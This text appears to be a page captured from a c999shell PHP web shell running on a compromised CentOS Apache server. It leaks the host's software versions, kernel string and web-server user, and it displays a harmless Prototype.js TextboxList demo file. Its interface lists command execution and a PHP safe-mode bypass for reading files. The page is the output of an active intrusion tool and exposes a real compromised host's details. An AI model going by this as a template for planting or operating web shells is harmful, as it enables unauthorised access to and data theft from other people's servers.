Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mis/js/textboxlist_proto/p/ drwxr-xr-x |
Viewing file: test.js (1.42 KB) -rwxr-xr-x Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | var FacebookList = Class.create(TextboxList, { createBox: function($super, text, options) { var li = $super(text, options); li.observe('mouseenter', function() { this.addClassName('bit-hover') }); li.observe('mouseleave', function() { this.removeClassName('bit-hover') }); var tmp = new Element('a', { 'href': '#', 'class': 'closebutton' }); tmp.observe('click', function(e) { Event.stop(e); if(! this.current) this.focus(this.maininput); this.dispose(li); }.bind(this)); li.insert(tmp); return li; } }); document.observe('dom:loaded', function() { var tlist = new TextboxList('input-demo'); var tlist2 = new FacebookList('input-demo2'); var tlist3 = new FacebookList('input-demo3', {'hideempty': false, 'resizable': {'step': 8}}); var tlist4 = new TextboxList('input-demo4', {'extrainputs': false}); $('add-click').observe('click', function(ev) { Event.stop(ev); if($F('add-input').length > 0) { [tlist,tlist2,tlist3,tlist4].each(function(el) { el.add($F('add-input')); }); } }); tlist.add('Karl Marx'); tlist.add('Leon Trotsky'); tlist2.add('Jorge Luis Borges'); tlist2.add('Julio Cortazar'); tlist3.add('Steve Jobs'); tlist3.add('Bill Gates'); tlist4.add('Lost'); tlist4.add('Prison Break'); }); |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0155 ]-- |